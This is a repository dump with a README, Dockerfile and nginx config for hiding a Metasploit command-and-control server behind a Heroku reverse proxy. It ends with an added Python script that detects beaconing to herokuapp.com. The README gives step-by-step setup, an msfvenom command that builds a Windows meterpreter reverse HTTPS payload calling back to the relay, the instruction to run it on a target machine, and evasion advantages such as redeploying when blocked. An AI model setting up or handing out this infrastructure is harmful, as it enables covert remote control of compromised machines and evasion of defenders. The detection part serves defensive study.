├── Dockerfile
├── README.md
├── app.json
├── configure.sh
└── heroku.yml

/Dockerfile:
--------------------------------------------------------------------------------
FROM nginx
# Copy the start-up script into the image (COPY is sufficient for a local file)
COPY configure.sh /configure.sh
RUN chmod +x /configure.sh
# Exec form: the script becomes PID 1 and receives the platform's stop signals directly
CMD ["/configure.sh"]
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Using Heroku to hide a C2 server
Heroku is a cloud platform-as-a-service that supports many programming languages. Put simply, it lets you deploy Docker containers for free and expose a web service to the Internet. The steps are described below.

- First register a Heroku account via [https://dashboard.heroku.com](https://dashboard.heroku.com/) (Gmail is recommended)
- After registering, log in and click the [deploy link](https://dashboard.heroku.com/new?template=https://github.com/FunnyWolf/nginx-proxy-heroku)
- Set the app name to `mydiydomain` (customisable; the name becomes the prefix of the resulting domain) and set the TARGET environment variable to the C2 handler's address

![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771065455-e03973a0-8763-4402-8b92-db358f8d0b1f.png#align=left&display=inline&height=488&margin=%5Bobject%20Object%5D&name=image.png&originHeight=976&originWidth=1224&size=76155&status=done&style=none&width=612)

- Then click Deploy app; the system deploys automatically.
- Add a handler in metasploit-framework, configured as shown

![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771665090-ad5c1ecd-c257-44f3-9128-4430183a2e34.png#align=left&display=inline&height=191&margin=%5Bobject%20Object%5D&name=image.png&originHeight=381&originWidth=1334&size=59756&status=done&style=none&width=667)![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771713694-163331e4-cb96-4bb9-aa79-84980ab9c4ee.png#align=left&display=inline&height=155&margin=%5Bobject%20Object%5D&name=image.png&originHeight=309&originWidth=2281&size=88820&status=done&style=none&width=1140.5)

- Run `to_handler` to generate the listener
- Generate the payload with the following command
```bash
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=mydiydomain.herokuapp.com LPORT=443 -f exe -o ~/payload.exe
```

- Upload it to the target machine and run it
# Result

- Viewing the session in metasploit-framework shows that the session's connection address is the address of the Heroku relay server

![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772048769-0192b120-768f-45ef-986f-4c13d4c1fae4.png#align=left&display=inline&height=133&margin=%5Bobject%20Object%5D&name=image.png&originHeight=265&originWidth=1737&size=32159&status=done&style=none&width=868.5)

- A packet capture on the target machine looks like this

![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772254394-2251f568-89ae-48de-9c55-36b864bbffb0.png#align=left&display=inline&height=33&margin=%5Bobject%20Object%5D&name=image.png&originHeight=66&originWidth=802&size=6382&status=done&style=none&width=401)
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772434299-3721e8f1-0eae-4296-b735-a741b20830d8.png#align=left&display=inline&height=230&margin=%5Bobject%20Object%5D&name=image.png&originHeight=459&originWidth=1612&size=144248&status=done&style=none&width=806)
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772464467-3e81edaf-c634-42de-8e79-8ef5091a7c03.png#align=left&display=inline&height=768&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1535&originWidth=1296&size=272442&status=done&style=none&width=648)
# Summary
Technically, hiding a C2 behind Heroku is very simple: an nginx reverse proxy is deployed as a Heroku service, the payload connects to the nginx instance on Heroku, and nginx forwards the traffic to the C2. The advantages are as follows:

- Only a free Heroku account is needed
- No domain has to be registered or bought
- A trusted SSL certificate comes for free (the Heroku domain has its own certificate)
- If the IP address is blocked, the existing Heroku app can be deleted and redeployed (about 30 s), to keep contending with defenders
- The procedure is simple
--------------------------------------------------------------------------------
/app.json:
--------------------------------------------------------------------------------
{
  "name": "nginx-proxy",
  "description": "Deploy nginx-proxy on Heroku.",
  "keywords": ["nginx-proxy"],
  "env": {
    "TARGET": {
      "description": "proxy target https://domain:port",
      "value": "https://baidu.com:443"
    }
  },
  "website": "",
  "repository": "https://github.com/FunnyWolf/nginx-proxy-heroku",
  "stack": "container"
}
--------------------------------------------------------------------------------
/configure.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Render the nginx config at container start. The heredoc is unquoted, so
# $PORT (assigned by Heroku) and $TARGET (the app's config var) are expanded here.

cat << EOF > /etc/nginx/nginx.conf
worker_processes 4;
events {
    worker_connections 1024;
}
http {
    include mime.types;
    default_type application/octet-stream;
    sendfile on;
    keepalive_timeout 300;
    server {
        # Heroku routes inbound HTTPS to the port it hands the container
        listen "$PORT";
        server_name 127.0.0.1;
        gzip on;
        gzip_min_length 1k;
        gzip_comp_level 9;
        gzip_types text/plain application/javascript application/x-javascript text/css application/xml text/javascript application/x-httpd-php image/jpeg image/gif image/png;
        gzip_vary on;
        gzip_disable "MSIE [1-6]\.";
        location / {
            # Every request is forwarded to the upstream named in TARGET
            proxy_pass "$TARGET";
        }
        error_page 500 502 503 504 /50x.html;
        location = /50x.html {
            # The official nginx image ships 50x.html here, not under the /etc/nginx prefix
            root /usr/share/nginx/html;
        }
    }
}
EOF

# exec so nginx replaces the shell as PID 1 and receives SIGTERM when the dyno stops
exec nginx -g 'daemon off;'
--------------------------------------------------------------------------------
/heroku.yml:
--------------------------------------------------------------------------------
build:
  docker:
    web: Dockerfile
--------------------------------------------------------------------------------
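The README's capture shows the implant talking only to `mydiydomain.herokuapp.com`, so the relay hides the C2's IP address but not the regular call-home rhythm or the shared platform suffix. The following is an added detection example, not part of this repository: it parses constructed connection records and flags hosts that contact a `*.herokuapp.com` SNI at near-constant intervals. The record format, sample addresses and thresholds are assumptions.

```python
import re
import statistics
from collections import defaultdict

# Constructed records "<epoch> <src_ip> <dst_ip> <dst_port> <sni>": 10.0.0.5 beacons
# to the README's LHOST every ~10 s; 10.0.0.7 is ordinary browsing (two Heroku hits).
SAMPLE_LOG = """\
1603772000 10.0.0.5 54.1.1.1 443 mydiydomain.herokuapp.com
1603772010 10.0.0.5 54.1.1.1 443 mydiydomain.herokuapp.com
1603772020 10.0.0.5 54.1.1.1 443 mydiydomain.herokuapp.com
1603772030 10.0.0.5 54.1.1.1 443 mydiydomain.herokuapp.com
1603772041 10.0.0.5 54.1.1.1 443 mydiydomain.herokuapp.com
1603772005 10.0.0.7 52.2.2.2 443 docs.example.com
1603772100 10.0.0.7 54.1.1.2 443 dashboard.herokuapp.com
1603772600 10.0.0.7 54.1.1.2 443 dashboard.herokuapp.com
"""

# Platform suffixes whose shared certificate is valid for every tenant's app.
PAAS_SUFFIXES = (".herokuapp.com",)
LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+\S+\s+\d+\s+(\S+)$")

def parse_paas_connections(text):
    """Yield (timestamp, src_ip, sni) for connections to a PaaS suffix."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the scan
        ts, src, sni = int(m.group(1)), m.group(2), m.group(3).lower()
        if sni.endswith(PAAS_SUFFIXES):
            yield ts, src, sni

def find_beacons(text, min_hits=4, max_cv=0.2):
    """Flag (src, sni) pairs seen >= min_hits times at near-constant intervals."""
    by_pair = defaultdict(list)
    for ts, src, sni in parse_paas_connections(text):
        by_pair[(src, sni)].append(ts)
    alerts = []
    for (src, sni), stamps in by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()  # log order need not be chronological
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue  # a burst with identical timestamps is not a beacon
        cv = statistics.pstdev(gaps) / mean  # jitter relative to the period
        if cv <= max_cv:
            alerts.append({"src": src, "sni": sni, "hits": len(stamps),
                           "mean_interval": mean, "cv": round(cv, 3)})
    return alerts
```

Because the platform domain and certificate are legitimate, the useful signals are the periodicity and the fact that a host talks to a single tenant app over and over; a newly deployed replacement app keeps the same rhythm even after the operator rotates it.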